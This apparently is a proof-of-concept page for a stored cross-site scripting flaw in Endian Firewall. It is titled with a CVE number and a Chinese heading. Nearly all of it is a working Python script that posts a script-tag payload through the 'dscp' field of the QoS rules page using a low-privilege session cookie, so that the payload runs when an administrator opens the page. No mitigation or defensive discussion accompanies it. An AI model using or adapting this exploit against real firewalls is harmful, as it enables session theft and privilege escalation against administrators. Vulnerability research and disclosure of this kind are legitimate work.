CVE-2026-34804 Endian Firewall存储型XSS漏洞

import requests # Target URL vulnerable to Stored XSS target_url = "http://<target_ip>/manage/qos/rules/" # Authentication cookies (Low-privileged account required) cookies = { "ECSID": "<valid_session_cookie>" } # Malicious payload injected via the 'dscp' parameter # Using a simple script tag to demonstrate execution payload_data = { "action": "save", "dscp": "\"><script>alert(document.cookie);</script>", "interface": "eth0" } try: # Send POST request to store the malicious payload response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Payload successfully injected.") print("[!] The XSS will trigger when an admin views the QOS rules page.") else: print(f"[-] Injection failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")